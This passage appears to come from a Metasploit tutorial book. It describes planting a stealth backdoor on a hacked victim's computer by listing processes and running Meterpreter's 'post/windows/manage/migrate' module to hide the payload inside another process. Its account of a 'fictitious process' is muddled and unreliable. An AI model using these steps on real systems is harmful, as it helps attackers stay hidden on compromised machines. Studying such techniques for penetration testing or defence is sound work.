My second example is where, after getting access to a computer target, I put a stealth backdoor into the victim's computer. The backdoor is installed here using the migrate feature contained in Meterpreter. The feature creates a fictitious process on the target computer. Here I use the PS command in Meterpreter when a target has been hacked:

F IGURE 88: PROCESS ON COMPUTER TARGET The picture above shows all processes on the target computer; after I see all these processes, I use the command: Meterpreter > run post/windows/manage/migrate

F IGURE 89: MAKE FICTITIOUS PROCESS ON THE TARGET COMPUTER The picture above shows that the command creates a fictitious process for Meterpreter so the svchost.exe process is manipulated to run Meterpreter on the target computer. The results are shown below:

Advanced Metasploit

51

F IGURE 90: FICTITIOUS PROCESS RUNNING Results from the victim's computer that is running a fictitious process show the process PID 1240 running notepad.exe, where the application is fictitious.